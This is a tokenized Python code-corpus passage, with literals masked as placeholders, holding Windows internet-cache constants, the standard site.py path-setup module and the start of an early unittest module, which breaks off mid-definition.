TRACK_OFFLINE_CACHE_ENTRY | TRACK_ONLINE_CACHE_ENTRY | STICKY_CACHE_ENTRY <EOL> CACHEGROUP_ATTRIBUTE_GET_ALL = ( - <NUM_LIT:1> ) <EOL> CACHEGROUP_ATTRIBUTE_BASIC = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_FLAG = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_TYPE = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_QUOTA = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_GROUPNAME = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_STORAGE = <NUM_LIT> <EOL> CACHEGROUP_FLAG_NONPURGEABLE = <NUM_LIT> <EOL> CACHEGROUP_FLAG_GIDONLY = <NUM_LIT> <EOL> CACHEGROUP_FLAG_FLUSHURL_ONDELETE = <NUM_LIT> <EOL> CACHEGROUP_SEARCH_ALL = <NUM_LIT> <EOL> CACHEGROUP_SEARCH_BYURL = <NUM_LIT> <EOL> CACHEGROUP_TYPE_INVALID = <NUM_LIT> <EOL> CACHEGROUP_READWRITE_MASK = CACHEGROUP_ATTRIBUTE_TYPE | CACHEGROUP_ATTRIBUTE_QUOTA | CACHEGROUP_ATTRIBUTE_GROUPNAME | CACHEGROUP_ATTRIBUTE_STORAGE <EOL> GROUPNAME_MAX_LENGTH = <NUM_LIT> <EOL> GROUP_OWNER_STORAGE_SIZE = <NUM_LIT:4> <EOL> CACHE_ENTRY_ATTRIBUTE_FC = <NUM_LIT> <EOL> CACHE_ENTRY_HITRATE_FC = <NUM_LIT> <EOL> CACHE_ENTRY_MODTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_EXPTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_ACCTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_SYNCTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_HEADERINFO_FC = <NUM_LIT> <EOL> CACHE_ENTRY_EXEMPT_DELTA_FC = <NUM_LIT> <EOL> INTERNET_CACHE_GROUP_ADD = <NUM_LIT:0> <EOL> 
INTERNET_CACHE_GROUP_REMOVE = <NUM_LIT:1> <EOL> INTERNET_DIAL_FORCE_PROMPT = <NUM_LIT> <EOL> INTERNET_DIAL_SHOW_OFFLINE = <NUM_LIT> <EOL> INTERNET_DIAL_UNATTENDED = <NUM_LIT> <EOL> INTERENT_GOONLINE_REFRESH = <NUM_LIT> <EOL> INTERENT_GOONLINE_MASK = <NUM_LIT> <EOL> INTERNET_AUTODIAL_FORCE_ONLINE = <NUM_LIT:1> <EOL> INTERNET_AUTODIAL_FORCE_UNATTENDED = <NUM_LIT:2> <EOL> INTERNET_AUTODIAL_FAILIFSECURITYCHECK = <NUM_LIT:4> <EOL> INTERNET_AUTODIAL_OVERRIDE_NET_PRESENT = <NUM_LIT:8> <EOL> INTERNET_AUTODIAL_FLAGS_MASK = ( INTERNET_AUTODIAL_FORCE_ONLINE | INTERNET_AUTODIAL_FORCE_UNATTENDED | INTERNET_AUTODIAL_FAILIFSECURITYCHECK | INTERNET_AUTODIAL_OVERRIDE_NET_PRESENT ) <EOL> PROXY_AUTO_DETECT_TYPE_DHCP = <NUM_LIT:1> <EOL> PROXY_AUTO_DETECT_TYPE_DNS_A = <NUM_LIT:2> <EOL> INTERNET_CONNECTION_MODEM = <NUM_LIT> <EOL> INTERNET_CONNECTION_LAN = <NUM_LIT> <EOL> INTERNET_CONNECTION_PROXY = <NUM_LIT> <EOL> INTERNET_CONNECTION_MODEM_BUSY = <NUM_LIT> <EOL> INTERNET_RAS_INSTALLED = <NUM_LIT> <EOL> INTERNET_CONNECTION_OFFLINE = <NUM_LIT> <EOL> INTERNET_CONNECTION_CONFIGURED = <NUM_LIT> <EOL> INTERNET_CUSTOMDIAL_CONNECT = <NUM_LIT:0> <EOL> INTERNET_CUSTOMDIAL_UNATTENDED = <NUM_LIT:1> <EOL> INTERNET_CUSTOMDIAL_DISCONNECT = <NUM_LIT:2> <EOL> INTERNET_CUSTOMDIAL_SHOWOFFLINE = <NUM_LIT:4> <EOL> INTERNET_CUSTOMDIAL_SAFE_FOR_UNATTENDED = <NUM_LIT:1> <EOL> INTERNET_CUSTOMDIAL_WILL_SUPPLY_STATE = <NUM_LIT:2> <EOL> INTERNET_CUSTOMDIAL_CAN_HANGUP = <NUM_LIT:4> <EOL> INTERNET_DIALSTATE_DISCONNECTED = <NUM_LIT:1> <EOL> INTERNET_IDENTITY_FLAG_PRIVATE_CACHE = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_SHARED_CACHE = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_DATA = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_COOKIES = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_HISTORY = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_CONTENT = <NUM_LIT> <EOL> INTERNET_SUPPRESS_RESET_ALL = <NUM_LIT> <EOL> INTERNET_SUPPRESS_COOKIE_POLICY = <NUM_LIT> <EOL> INTERNET_SUPPRESS_COOKIE_POLICY_RESET = <NUM_LIT> <EOL> 
PRIVACY_TEMPLATE_NO_COOKIES = <NUM_LIT:0> <EOL> PRIVACY_TEMPLATE_HIGH = <NUM_LIT:1> <EOL> PRIVACY_TEMPLATE_MEDIUM_HIGH = <NUM_LIT:2> <EOL> PRIVACY_TEMPLATE_MEDIUM = <NUM_LIT:3> <EOL> PRIVACY_TEMPLATE_MEDIUM_LOW = <NUM_LIT:4> <EOL> PRIVACY_TEMPLATE_LOW = <NUM_LIT:5> <EOL> PRIVACY_TEMPLATE_CUSTOM = <NUM_LIT:100> <EOL> PRIVACY_TEMPLATE_ADVANCED = <NUM_LIT> <EOL> PRIVACY_TEMPLATE_MAX = PRIVACY_TEMPLATE_LOW <EOL> PRIVACY_TYPE_FIRST_PARTY = <NUM_LIT:0> <EOL> PRIVACY_TYPE_THIRD_PARTY = <NUM_LIT:1> </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import __builtin__ <EOL> PREFIXES = [ sys . prefix , sys . exec_prefix ] <EOL> ENABLE_USER_SITE = None <EOL> USER_SITE = None <EOL> USER_BASE = None <EOL> def makepath ( * paths ) : <EOL> dir = os . path . abspath ( os . path . join ( * paths ) ) <EOL> return dir , os . path . normcase ( dir ) <EOL> def abs__file__ ( ) : <EOL> """<STR_LIT>""" <EOL> for m in sys . modules . values ( ) : <EOL> if hasattr ( m , '<STR_LIT>' ) : <EOL> continue <EOL> try : <EOL> m . __file__ = os . path . abspath ( m . __file__ ) <EOL> except AttributeError : <EOL> continue <EOL> def removeduppaths ( ) : <EOL> """<STR_LIT>""" <EOL> L = [ ] <EOL> known_paths = set ( ) <EOL> for dir in sys . path : <EOL> dir , dircase = makepath ( dir ) <EOL> if not dircase in known_paths : <EOL> L . append ( dir ) <EOL> known_paths . add ( dircase ) <EOL> sys . path [ : ] = L <EOL> return known_paths <EOL> def addbuilddir ( ) : <EOL> """<STR_LIT>""" <EOL> from distutils . util import get_platform <EOL> s = "<STR_LIT>" % ( get_platform ( ) , sys . version ) <EOL> if hasattr ( sys , '<STR_LIT>' ) : <EOL> s += '<STR_LIT>' <EOL> s = os . path . join ( os . path . dirname ( sys . path [ - <NUM_LIT:1> ] ) , s ) <EOL> sys . path . append ( s ) <EOL> def _init_pathinfo ( ) : <EOL> """<STR_LIT>""" <EOL> d = set ( ) <EOL> for dir in sys . path : <EOL> try : <EOL> if os . path . isdir ( dir ) : <EOL> dir , dircase = makepath ( dir ) <EOL> d . add ( dircase ) <EOL> except TypeError : <EOL> continue <EOL> return d <EOL> def addpackage ( sitedir , name , known_paths ) : <EOL> """<STR_LIT>""" <EOL> if known_paths is None : <EOL> _init_pathinfo ( ) <EOL> reset = <NUM_LIT:1> <EOL> else : <EOL> reset = <NUM_LIT:0> <EOL> fullname = os . path . join ( sitedir , name ) <EOL> try : <EOL> f = open ( fullname , "<STR_LIT>" ) <EOL> except IOError : <EOL> return <EOL> with f : <EOL> for line in f : <EOL> if line . 
startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> if line . startswith ( ( "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> exec line <EOL> continue <EOL> line = line . rstrip ( ) <EOL> dir , dircase = makepath ( sitedir , line ) <EOL> if not dircase in known_paths and os . path . exists ( dir ) : <EOL> sys . path . append ( dir ) <EOL> known_paths . add ( dircase ) <EOL> if reset : <EOL> known_paths = None <EOL> return known_paths <EOL> def addsitedir ( sitedir , known_paths = None ) : <EOL> """<STR_LIT>""" <EOL> if known_paths is None : <EOL> known_paths = _init_pathinfo ( ) <EOL> reset = <NUM_LIT:1> <EOL> else : <EOL> reset = <NUM_LIT:0> <EOL> sitedir , sitedircase = makepath ( sitedir ) <EOL> if not sitedircase in known_paths : <EOL> sys . path . append ( sitedir ) <EOL> try : <EOL> names = os . listdir ( sitedir ) <EOL> except os . error : <EOL> return <EOL> dotpth = os . extsep + "<STR_LIT>" <EOL> names = [ name for name in names if name . endswith ( dotpth ) ] <EOL> for name in sorted ( names ) : <EOL> addpackage ( sitedir , name , known_paths ) <EOL> if reset : <EOL> known_paths = None <EOL> return known_paths <EOL> def check_enableusersite ( ) : <EOL> """<STR_LIT>""" <EOL> if sys . flags . no_user_site : <EOL> return False <EOL> if hasattr ( os , "<STR_LIT>" ) and hasattr ( os , "<STR_LIT>" ) : <EOL> if os . geteuid ( ) != os . getuid ( ) : <EOL> return None <EOL> if hasattr ( os , "<STR_LIT>" ) and hasattr ( os , "<STR_LIT>" ) : <EOL> if os . getegid ( ) != os . getgid ( ) : <EOL> return None <EOL> return True <EOL> def addusersitepackages ( known_paths ) : <EOL> """<STR_LIT>""" <EOL> global USER_BASE , USER_SITE , ENABLE_USER_SITE <EOL> env_base = os . environ . get ( "<STR_LIT>" , None ) <EOL> def joinuser ( * args ) : <EOL> return os . path . expanduser ( os . path . join ( * args ) ) <EOL> if os . name == "<STR_LIT>" : <EOL> base = os . environ . 
get ( "<STR_LIT>" ) or "<STR_LIT>" <EOL> USER_BASE = env_base if env_base else joinuser ( base , "<STR_LIT>" ) <EOL> USER_SITE = os . path . join ( USER_BASE , <EOL> "<STR_LIT>" + sys . version [ <NUM_LIT:0> ] + sys . version [ <NUM_LIT:2> ] , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> USER_BASE = env_base if env_base else joinuser ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> USER_SITE = os . path . join ( USER_BASE , "<STR_LIT>" , <EOL> "<STR_LIT>" + sys . version [ : <NUM_LIT:3> ] , <EOL> "<STR_LIT>" ) <EOL> if ENABLE_USER_SITE and os . path . isdir ( USER_SITE ) : <EOL> addsitedir ( USER_SITE , known_paths ) <EOL> return known_paths <EOL> def addsitepackages ( known_paths ) : <EOL> """<STR_LIT>""" <EOL> sitedirs = [ ] <EOL> seen = [ ] <EOL> for prefix in PREFIXES : <EOL> if not prefix or prefix in seen : <EOL> continue <EOL> seen . append ( prefix ) <EOL> if sys . platform in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> elif os . sep == '<STR_LIT:/>' : <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , <EOL> "<STR_LIT>" + sys . version [ : <NUM_LIT:3> ] , <EOL> "<STR_LIT>" ) ) <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> else : <EOL> sitedirs . append ( prefix ) <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> if sys . platform == "<STR_LIT>" : <EOL> if '<STR_LIT>' in prefix : <EOL> sitedirs . append ( <EOL> os . path . expanduser ( <EOL> os . path . join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> sys . version [ : <NUM_LIT:3> ] , "<STR_LIT>" ) ) ) <EOL> for sitedir in sitedirs : <EOL> if os . path . isdir ( sitedir ) : <EOL> addsitedir ( sitedir , known_paths ) <EOL> return known_paths <EOL> def setBEGINLIBPATH ( ) : <EOL> """<STR_LIT>""" <EOL> dllpath = os . path . join ( sys . prefix , "<STR_LIT>" , "<STR_LIT>" ) <EOL> libpath = os . environ [ '<STR_LIT>' ] . 
split ( '<STR_LIT:;>' ) <EOL> if libpath [ - <NUM_LIT:1> ] : <EOL> libpath . append ( dllpath ) <EOL> else : <EOL> libpath [ - <NUM_LIT:1> ] = dllpath <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:;>' . join ( libpath ) <EOL> def setquit ( ) : <EOL> """<STR_LIT>""" <EOL> if os . sep == '<STR_LIT::>' : <EOL> eof = '<STR_LIT>' <EOL> elif os . sep == '<STR_LIT:\\>' : <EOL> eof = '<STR_LIT>' <EOL> else : <EOL> eof = '<STR_LIT>' <EOL> class Quitter ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . name , eof ) <EOL> def __call__ ( self , code = None ) : <EOL> try : <EOL> sys . stdin . close ( ) <EOL> except : <EOL> pass <EOL> raise SystemExit ( code ) <EOL> __builtin__ . quit = Quitter ( '<STR_LIT>' ) <EOL> __builtin__ . exit = Quitter ( '<STR_LIT>' ) <EOL> class _Printer ( object ) : <EOL> """<STR_LIT>""" <EOL> MAXLINES = <NUM_LIT> <EOL> def __init__ ( self , name , data , files = ( ) , dirs = ( ) ) : <EOL> self . __name = name <EOL> self . __data = data <EOL> self . __files = files <EOL> self . __dirs = dirs <EOL> self . __lines = None <EOL> def __setup ( self ) : <EOL> if self . __lines : <EOL> return <EOL> data = None <EOL> for dir in self . __dirs : <EOL> for filename in self . __files : <EOL> filename = os . path . join ( dir , filename ) <EOL> try : <EOL> fp = file ( filename , "<STR_LIT>" ) <EOL> data = fp . read ( ) <EOL> fp . close ( ) <EOL> break <EOL> except IOError : <EOL> pass <EOL> if data : <EOL> break <EOL> if not data : <EOL> data = self . __data <EOL> self . __lines = data . split ( '<STR_LIT:\n>' ) <EOL> self . __linecnt = len ( self . __lines ) <EOL> def __repr__ ( self ) : <EOL> self . __setup ( ) <EOL> if len ( self . __lines ) <= self . MAXLINES : <EOL> return "<STR_LIT:\n>" . join ( self . __lines ) <EOL> else : <EOL> return "<STR_LIT>" % ( ( self . __name , ) * <NUM_LIT:2> ) <EOL> def __call__ ( self ) : <EOL> self . 
__setup ( ) <EOL> prompt = '<STR_LIT>' <EOL> lineno = <NUM_LIT:0> <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> for i in range ( lineno , lineno + self . MAXLINES ) : <EOL> print self . __lines [ i ] <EOL> except IndexError : <EOL> break <EOL> else : <EOL> lineno += self . MAXLINES <EOL> key = None <EOL> while key is None : <EOL> key = raw_input ( prompt ) <EOL> if key not in ( '<STR_LIT>' , '<STR_LIT:q>' ) : <EOL> key = None <EOL> if key == '<STR_LIT:q>' : <EOL> break <EOL> def setcopyright ( ) : <EOL> """<STR_LIT>""" <EOL> __builtin__ . copyright = _Printer ( "<STR_LIT>" , sys . copyright ) <EOL> if sys . platform [ : <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> __builtin__ . credits = _Printer ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> __builtin__ . credits = _Printer ( "<STR_LIT>" , """<STR_LIT>""" ) <EOL> here = os . path . dirname ( os . __file__ ) <EOL> __builtin__ . license = _Printer ( <EOL> "<STR_LIT>" , "<STR_LIT>" % sys . version , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ os . path . join ( here , os . pardir ) , here , os . curdir ] ) <EOL> class _Helper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" "<STR_LIT>" <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> import pydoc <EOL> return pydoc . help ( * args , ** kwds ) <EOL> def sethelper ( ) : <EOL> __builtin__ . help = _Helper ( ) <EOL> def aliasmbcs ( ) : <EOL> """<STR_LIT>""" <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> import locale , codecs <EOL> enc = locale . getdefaultlocale ( ) [ <NUM_LIT:1> ] <EOL> if enc . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> codecs . lookup ( enc ) <EOL> except LookupError : <EOL> import encodings <EOL> encodings . _cache [ enc ] = encodings . _unknown <EOL> encodings . aliases . aliases [ enc ] = '<STR_LIT>' <EOL> def setencoding ( ) : <EOL> """<STR_LIT>""" <EOL> encoding = "<STR_LIT:ascii>" <EOL> if <NUM_LIT:0> : <EOL> import locale <EOL> loc = locale . 
getdefaultlocale ( ) <EOL> if loc [ <NUM_LIT:1> ] : <EOL> encoding = loc [ <NUM_LIT:1> ] <EOL> if <NUM_LIT:0> : <EOL> encoding = "<STR_LIT>" <EOL> if encoding != "<STR_LIT:ascii>" : <EOL> sys . setdefaultencoding ( encoding ) <EOL> def execsitecustomize ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import sitecustomize <EOL> except ImportError : <EOL> pass <EOL> def execusercustomize ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import usercustomize <EOL> except ImportError : <EOL> pass <EOL> def main ( ) : <EOL> global ENABLE_USER_SITE <EOL> abs__file__ ( ) <EOL> known_paths = removeduppaths ( ) <EOL> if ( os . name == "<STR_LIT>" and sys . path and <EOL> os . path . basename ( sys . path [ - <NUM_LIT:1> ] ) == "<STR_LIT>" ) : <EOL> addbuilddir ( ) <EOL> if ENABLE_USER_SITE is None : <EOL> ENABLE_USER_SITE = check_enableusersite ( ) <EOL> known_paths = addusersitepackages ( known_paths ) <EOL> known_paths = addsitepackages ( known_paths ) <EOL> if sys . platform == '<STR_LIT>' : <EOL> setBEGINLIBPATH ( ) <EOL> setquit ( ) <EOL> setcopyright ( ) <EOL> sethelper ( ) <EOL> aliasmbcs ( ) <EOL> setencoding ( ) <EOL> execsitecustomize ( ) <EOL> if ENABLE_USER_SITE : <EOL> execusercustomize ( ) <EOL> if hasattr ( sys , "<STR_LIT>" ) : <EOL> del sys . setdefaultencoding <EOL> main ( ) <EOL> def _script ( ) : <EOL> help = """<STR_LIT>""" <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> if not args : <EOL> print "<STR_LIT>" <EOL> for dir in sys . path : <EOL> print "<STR_LIT>" % ( dir , ) <EOL> print "<STR_LIT:]>" <EOL> print "<STR_LIT>" % ( USER_BASE , <EOL> "<STR_LIT>" if os . path . isdir ( USER_BASE ) else "<STR_LIT>" ) <EOL> print "<STR_LIT>" % ( USER_SITE , <EOL> "<STR_LIT>" if os . path . isdir ( USER_SITE ) else "<STR_LIT>" ) <EOL> print "<STR_LIT>" % ENABLE_USER_SITE <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> buffer = [ ] <EOL> if '<STR_LIT>' in args : <EOL> buffer . append ( USER_BASE ) <EOL> if '<STR_LIT>' in args : <EOL> buffer . 
append ( USER_SITE ) <EOL> if buffer : <EOL> print os . pathsep . join ( buffer ) <EOL> if ENABLE_USER_SITE : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> elif ENABLE_USER_SITE is False : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif ENABLE_USER_SITE is None : <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> else : <EOL> import textwrap <EOL> print textwrap . dedent ( help % ( sys . argv [ <NUM_LIT:0> ] , os . pathsep ) ) <EOL> sys . exit ( <NUM_LIT:10> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _script ( ) </s>
<s> '''<STR_LIT>''' <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" [ <NUM_LIT:11> : - <NUM_LIT:2> ] <EOL> import time <EOL> import sys <EOL> import traceback <EOL> import os <EOL> import types <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __all__ . extend ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if sys . version_info [ : <NUM_LIT:2> ] < ( <NUM_LIT:2> , <NUM_LIT:2> ) : <EOL> def isinstance ( obj , clsinfo ) : <EOL> import __builtin__ <EOL> if type ( clsinfo ) in ( tuple , list ) : <EOL> for cls in clsinfo : <EOL> if cls is type : cls = types . ClassType <EOL> if __builtin__ . isinstance ( obj , cls ) : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> else : return __builtin__ . isinstance ( obj , clsinfo ) <EOL> def _CmpToKey ( mycmp ) : <EOL> '<STR_LIT>' <EOL> class K ( object ) : <EOL> def __init__ ( self , obj ) : <EOL> self . obj = obj <EOL> def __lt__ ( self , other ) : <EOL> return mycmp ( self . obj , other . obj ) == - <NUM_LIT:1> <EOL> return K <EOL> __metaclass__ = type <EOL> def _strclass ( cls ) : <EOL> return "<STR_LIT>" % ( cls . __module__ , cls . __name__ ) <EOL> __unittest = <NUM_LIT:1> <EOL> class TestResult : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . failures = [ ] <EOL> self . errors = [ ] <EOL> self . testsRun = <NUM_LIT:0> <EOL> self . shouldStop = False <EOL> def startTest ( self , test ) : <EOL> "<STR_LIT>" <EOL> self . testsRun = self . testsRun + <NUM_LIT:1> <EOL> def stopTest ( self , test ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def addError ( self , test , err ) : <EOL> """<STR_LIT>""" <EOL> self . errors . append ( ( test , self . _exc_info_to_string ( err , test ) ) ) <EOL> def addFailure ( self , test , err ) : <EOL> """<STR_LIT>""" <EOL> self . failures . append ( ( test , self . 
_exc_info_to_string ( err , test ) ) ) <EOL> def addSuccess ( self , test ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def wasSuccessful ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . failures ) == len ( self . errors ) == <NUM_LIT:0> <EOL> def stop ( self ) : <EOL> "<STR_LIT>" <EOL> self . shouldStop = True <EOL> def _exc_info_to_string ( self , err , test ) : <EOL> """<STR_LIT>""" <EOL> exctype , value , tb = err <EOL> while tb and self . _is_relevant_tb_level ( tb ) : <EOL> tb = tb . tb_next <EOL> if exctype is test . failureException : <EOL> length = self . _count_relevant_tb_levels ( tb ) <EOL> return '<STR_LIT>' . join ( traceback . format_exception ( exctype , value , tb , length ) ) <EOL> return '<STR_LIT>' . join ( traceback . format_exception ( exctype , value , tb ) ) <EOL> def _is_relevant_tb_level ( self , tb ) : <EOL> return '<STR_LIT>' in tb . tb_frame . f_globals <EOL> def _count_relevant_tb_levels ( self , tb ) : <EOL> length = <NUM_LIT:0> <EOL> while tb and not self . _is_relevant_tb_level ( tb ) : <EOL> length += <NUM_LIT:1> <EOL> tb = tb . tb_next <EOL> return length <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . testsRun , len ( self . errors ) , <EOL> len ( self . failures ) ) <EOL> class TestCase : <EOL> """<STR_LIT>""" <EOL> failureException = AssertionError <EOL> def __init__ ( self , methodName = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _testMethodName = methodName <EOL> testMethod = getattr ( self , methodName ) <EOL> self . _testMethodDoc = testMethod . __doc__ <EOL> except AttributeError : <EOL> raise ValueError , "<STR_LIT>" % ( self . 
__class__ , methodName ) <EOL> def setUp ( self ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def tearDown ( self ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def countTestCases ( self ) : <EOL> return <NUM_LIT:1> <EOL> def defaultTestResult ( self ) : <EOL> return TestResult ( ) <EOL> def shortDescription ( self ) : <EOL> """<STR_LIT>""" <EOL> doc = self . _testMethodDoc <EOL> return doc and doc . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:0> ] . strip ( ) or None <EOL> def id ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . _testMethodName ) <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : <EOL> return False <EOL> return self . _testMethodName == other . _testMethodName <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> return hash ( ( type ( self ) , self . _testMethodName ) ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _testMethodName , _strclass ( self . __class__ ) ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . _testMethodName ) <EOL> def run ( self , result = None ) : <EOL> if result is None : result = self . defaultTestResult ( ) <EOL> result . startTest ( self ) <EOL> testMethod = getattr ( self , self . _testMethodName ) <EOL> try : <EOL> try : <EOL> self . setUp ( ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except : <EOL> result . addError ( self , self . _exc_info ( ) ) <EOL> return <EOL> ok = False <EOL> try : <EOL> testMethod ( ) <EOL> ok = True <EOL> except self . failureException : <EOL> result . addFailure ( self , self . _exc_info ( ) ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except : <EOL> result . addError ( self , self . _exc_info ( ) ) <EOL> try : <EOL> self . tearDown ( ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except : <EOL> result . addError ( self , self . _exc_info ( ) ) <EOL> ok = False <EOL> if ok : result . 
addSuccess ( self ) <EOL> finally : <EOL> result . stopTest ( self ) <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> return self . run ( * args , ** kwds ) <EOL> def debug ( self ) : <EOL> """<STR_LIT>""" <EOL> self . setUp ( ) <EOL> getattr ( self , self . _testMethodName ) ( ) <EOL> self . tearDown ( ) <EOL> def _exc_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return sys . exc_info ( ) <EOL> def fail ( self , msg = None ) : <EOL> """<STR_LIT>""" <EOL> raise self . failureException , msg <EOL> def failIf ( self , expr , msg = None ) : <EOL> "<STR_LIT>" <EOL> if expr : raise self . failureException , msg <EOL> def failUnless ( self , expr , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if not expr : raise self . failureException , msg <EOL> def failUnlessRaises ( self , excClass , callableObj , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> callableObj ( * args , ** kwargs ) <EOL> except excClass : <EOL> return <EOL> else : <EOL> if hasattr ( excClass , '<STR_LIT>' ) : excName = excClass . __name__ <EOL> else : excName = str ( excClass ) <EOL> raise self . failureException , "<STR_LIT>" % excName <EOL> def failUnlessEqual ( self , first , second , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if not first == second : <EOL> raise self . failureException , ( msg or '<STR_LIT>' % ( first , second ) ) <EOL> def failIfEqual ( self , first , second , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if first == second : <EOL> raise self . failureException , ( msg or '<STR_LIT>' % ( first , second ) ) <EOL> def failUnlessAlmostEqual ( self , first , second , places = <NUM_LIT:7> , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if round ( abs ( second - first ) , places ) != <NUM_LIT:0> : <EOL> raise self . 
failureException , ( msg or '<STR_LIT>' % ( first , second , places ) ) <EOL> def failIfAlmostEqual ( self , first , second , places = <NUM_LIT:7> , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if round ( abs ( second - first ) , places ) == <NUM_LIT:0> : <EOL> raise self . failureException , ( msg or '<STR_LIT>' % ( first , second , places ) ) <EOL> assertEqual = assertEquals = failUnlessEqual <EOL> assertNotEqual = assertNotEquals = failIfEqual <EOL> assertAlmostEqual = assertAlmostEquals = failUnlessAlmostEqual <EOL> assertNotAlmostEqual = assertNotAlmostEquals = failIfAlmostEqual <EOL> assertRaises = failUnlessRaises <EOL> assert_ = assertTrue = failUnless <EOL> assertFalse = failIf <EOL> class TestSuite : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tests = ( ) ) : <EOL> self . _tests = [ ] <EOL> self . addTests ( tests ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . _tests ) <EOL> __str__ = __repr__ <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : <EOL> return False <EOL> return self . _tests == other . _tests <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> __hash__ = None <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _tests ) <EOL> def countTestCases ( self ) : <EOL> cases = <NUM_LIT:0> <EOL> for test in self . _tests : <EOL> cases += test . countTestCases ( ) <EOL> return cases <EOL> def addTest ( self , test ) : <EOL> if not hasattr ( test , '<STR_LIT>' ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( isinstance ( test , ( type , types . ClassType ) ) and <EOL> issubclass ( test , ( TestCase , TestSuite ) ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _tests . append ( test ) <EOL> def addTests ( self , tests ) : <EOL> if isinstance ( tests , basestring ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> for test in tests : <EOL> self . 
